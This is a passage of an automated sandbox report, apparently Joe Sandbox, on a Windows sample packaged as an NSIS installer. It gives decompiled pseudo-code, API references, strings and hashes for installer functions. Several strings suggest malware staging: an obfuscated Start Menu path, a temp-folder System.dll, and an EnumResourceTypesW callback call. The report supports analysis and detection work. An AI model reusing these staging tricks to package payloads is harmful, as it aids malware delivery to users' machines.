					__eflags = _t109 - 4;
					_v8 = _t89;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t114 = _t109;
							_t114 = _t114 + _t98;
							__eflags = _t114;
						} else {
							 *_t114 =  *_t89;
							_t114 = _t114 + _t98;
							_t89 = _t89 + _t98;
						}
						continue;
					}
					_t51 =  *((intOrPtr*)(_t89 + 1));
					_t90 =  *_t89;
					_v8 = _v8 + 2;
					_t85 = _t90 & 0x000000ff;
					_t52 = _t51 & 0x000000ff;
					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
					_v16 = _t52;
					_t53 = _t52 | 0x00008000;
					__eflags = _t109 - 2;
					_v24 = _t85;
					_v28 = _t85 | 0x00008000;
					_v20 = _t53;
					if(_t109 != 2) {
						__eflags = _t109 - 3;
						if(_t109 != 3) {
							__eflags = _t109 - 1;
							if(_t109 == 1) {
								__eflags = (_t53 | 0xffffffff) - _a8;
								E00406234(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
							}
							L42:
							_t54 = lstrlenW(_t114);
							_t89 = _v8;
							_t114 =  &(_t114[_t54]);
							_t49 = 0x4281e0;
							continue;
						}
						__eflags = _a8 - 0x1d;
						if(_a8 != 0x1d) {
							__eflags = L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_a8 << 0xb);
							E00406212(_t114, L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_a8 << 0xb));
						} else {
							E00406159(_t114,  *0x42a248);
						}
						__eflags = _a8 + 0xffffffeb - 7;
						if(_a8 + 0xffffffeb < 7) {
							L33:
							E004064A6(_t114);
						}
						goto L42;
					}
					_t112 = 2;
					_t66 = GetVersion();
					__eflags = _t66;
					if(_t66 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42a2c4;
						if( *0x42a2c4 != 0) {
							_t112 = 4;
						}
						__eflags = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 == 0x24) {
									GetWindowsDirectoryW(_t114, 0x400);
									_t112 = 0;
								}
								while(1) {
									__eflags = _t112;
									if(_t112 == 0) {
										goto L30;
									}
									_t67 =  *0x42a244;
									_t112 = _t112 - 1;
									__eflags = _t67;
									if(_t67 == 0) {
										L26:
										_t69 = SHGetSpecialFolderLocation( *0x42a248,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											L28:
											 *_t114 =  *_t114 & 0x00000000;
											__eflags =  *_t114;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t114);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t71 =  *_t67( *0x42a248,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
									__eflags = _t71;
									if(_t71 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t114, 0x400);
							goto L30;
						} else {
							_t87 = _t85 & 0x0000003f;
							E004060DF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a278 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
							__eflags =  *_t114;
							if( *_t114 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406234(_t87, _t112, _t114, _t114, _v16);
							L30:
							__eflags =  *_t114;
							if( *_t114 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t66 - 0x5a04;
					if(_t66 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t114 =  *_t114 & 0x00000000;
				if(_a4 == 0) {
					return _t49;
				}
				return E00406212(_a4, _t49);
			}

0x00406234
0x00406234
0x00406234
0x0040623a
0x0040623f
0x00406250
0x00406250
0x00406258
0x00406259
0x0040625a
0x0040625b
0x0040625e
0x00406266
0x00406268
0x00406281
0x00406284
0x00406284
0x00406480
0x00406480
0x00406486
0x00000000
0x00000000
0x00406294
0x0040629a
0x00000000
0x00000000
0x004062a2
0x004062a3
0x004062a5
0x004062a9
0x004062ac
0x0040646d
0x0040647b
0x0040647e
0x0040647e
0x0040646f
0x00406472
0x00406475
0x00406477
0x00406477
0x00000000
0x0040646d
0x004062b2
0x004062b5
0x004062c4
0x004062ca
0x004062cd
0x004062d0
0x004062da
0x004062df
0x004062e1
0x004062e5
0x004062e8
0x004062eb
0x004062ee
0x0040640e
0x00406412
0x00406447
0x0040644b
0x00406450
0x00406455
0x00406455
0x0040645a
0x0040645b
0x00406460
0x00406463
0x00406466
0x00000000
0x00406466
0x00406414
0x00406418
0x0040642e
0x00406435
0x0040641a
0x00406421
0x00406421
0x00406440
0x00406443
0x00406406
0x00406407
0x00406407
0x00000000
0x00406443
0x004062f6
0x004062f7
0x004062fd
0x004062ff
0x00406319
0x00406319
0x00406320
0x00406320
0x00406327
0x0040632b
0x0040632b
0x0040632c
0x0040632e
0x0040636a
0x0040636d
0x0040637d
0x00406380
0x00406388
0x0040638e
0x0040638e
0x004063eb
0x004063eb
0x004063ed
0x00000000
0x00000000
0x00406392
0x00406399
0x0040639a
0x0040639c
0x004063b6
0x004063c4
0x004063ca
0x004063cc
0x004063e7
0x004063e7
0x004063e7
0x00000000
0x004063e7
0x004063d2
0x004063dd
0x004063e3
0x004063e5
0x00000000
0x00000000
0x00000000
0x004063e5
0x0040639e
0x004063a1
0x00000000
0x00000000
0x004063b0
0x004063b2
0x004063b4
0x00000000
0x00000000
0x00000000
0x004063b4
0x00000000
0x004063eb
0x00406375
0x00000000
0x00406330
0x00406332
0x0040634d
0x00406352
0x00406356
0x004063f5
0x004063f5
0x004063f9
0x00406401
0x00406401
0x00000000
0x004063f9
0x00406360
0x004063ef
0x004063ef
0x004063f3
0x00000000
0x00000000
0x00000000
0x004063f3
0x0040632e
0x00406301
0x00406305
0x00000000
0x00000000
0x00406307
0x0040630b
0x00000000
0x00000000
0x0040630d
0x00406311
0x00000000
0x00406313
0x00406313
0x00000000
0x00406313
0x00406311
0x0040648c
0x00406497
0x004064a3
0x004064a3
0x00000000

APIs

GetVersion.KERNEL32(00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 004062F7
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406375
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406388
SHGetFolderPathW.SHELL32(?,00000000,00000000,Call), ref: 004063B0
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063D2
CoTaskMemFree.OLE32(?), ref: 004063DD
lstrcatW.KERNEL32 ref: 00406401
lstrlenW.KERNEL32(Call,00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 0040645B

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406343
Call, xrefs: 0040625E, 0040633E, 0040635F, 00406374, 00406387, 004063A3, 004063CE, 00406400, 00406406, 00406420, 00406434, 00406454, 0040645A, 00406466, 00406499
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004063FB
kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 0040642E

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
API String ID: 3575957451-3610614223
Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C53(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405C3D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405BC6(E00406212(_t84, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac")), ??);
				} else {
					E00406212();
				}
				E004064A6(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406555(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405DC2(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405DE7(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405371(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2c8;
						goto L32;
					} else {
						E00406212("C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp", _t81);
						E00406212(_t81, _t84);
						E00406234(_t77, _t81, _t84, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406212(_t81, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp");
						_t64 = E00405957("C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2c8 =  &( *0x42a2c8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405371();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405371(0xffffffea,  *(_t86 - 8));
				 *0x42a2f4 =  *0x42a2f4 + 1;
				_t45 = E0040317B(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
				 *0x42a2f4 =  *0x42a2f4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E00405957();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x004028a1
0x004028a1
0x00402adb
0x00402ade
0x00402ade
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ae4
0x00402ae4
0x00402ae4
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f7
0x004022f7
0x004022f7
0x00401865
0x0040185e
0x00402ae6
0x00402aea
0x00402aea
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022f2
0x00000000
0x004022f2
0x00000000

APIs

lstrcatW.KERNEL32 ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?,?,00000031), ref: 004017D5

Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F

Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsp5B93.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp$C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac$Call
API String ID: 1941528284-2966689892
Opcode ID: 4b4fd6f5ecf2900afcae32528c4112f55eb1a5073c8ee7446931cab05ab2727e
Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
Opcode Fuzzy Hash: 4b4fd6f5ecf2900afcae32528c4112f55eb1a5073c8ee7446931cab05ab2727e
Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402660 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402660(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C31(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x50)) = _t72;
				 *((intOrPtr*)(_t76 - 0x38)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x38) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E00406172(__ecx, __esi);
						if( *(__ebp - 0x38) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405EC8( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405E6A( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406159( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x38));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402660
0x00402662
0x00402665
0x00402667
0x0040266a
0x0040266f
0x00402673
0x00402676
0x00402679
0x00402adb
0x00402ade
0x0040267f
0x0040267f
0x00402686
0x00402688
0x00402688
0x0040268e
0x004027f2
0x004027f2
0x004027f5
0x004027fa
0x004015b6
0x004028a1
0x004028a1
0x00000000
0x00402694
0x00402695
0x004026a0
0x004026a3
0x004026af
0x004026b3
0x0040274b
0x00402763
0x00402773
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004026b9
0x004026b9
0x004026bc
0x004026bd
0x004026c0
0x004026c5
0x004026cc
0x004026d4
0x00000000
0x004026da
0x004026da
0x004026df
0x00000000
0x004026e5
0x004026e5
0x004026ed
0x004026f0
0x004026f3
0x004027ae
0x004027b5
0x004026f9
0x004026ff
0x0040270b
0x00402775
0x00402775
0x0040270d
0x0040270d
0x00402710
0x00402712
0x00402712
0x00402712
0x00402715
0x0040271a
0x0040271d
0x00000000
0x00000000
0x0040271f
0x00402722
0x0040272a
0x00402736
0x00402744
0x00000000
0x00402746
0x00000000
0x00402746
0x00000000
0x00402744
0x00402712
0x00402778
0x0040277b
0x00000000
0x0040277d
0x00402782
0x004027c3
0x004027e5
0x004027ec
0x004027d1
0x004027d1
0x004027d4
0x004027d7
0x004027da
0x004027da
0x00000000
0x0040278b
0x0040278b
0x0040278e
0x00402791
0x00402797
0x0040279b
0x0040279e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040279e
0x00402782
0x0040277b
0x004026f3
0x004026df
0x004026d4
0x00000000
0x004027a0
0x004027a0
0x004027a3
0x004027ac
0x00000000
0x004026a3
0x0040268e
0x00402ae4
0x00402aea

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026CC
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740

Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC

Strings

9, xrefs: 004026AF

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C31(2);
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdf0 = E00402C31(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				 *0x40cdf7 = 1;
				 *0x40cdf4 = _t15 & 0x00000001;
				 *0x40cdf5 = _t15 & 0x00000002;
				 *0x40cdf6 = _t15 & 0x00000004;
				E00406234(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cde0); // executed
				_push(_t18);
				_push(_t33);
				E00406159();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x004025a8
0x0040156d
0x00402a81
0x00402ade
0x00402aea

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32 ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
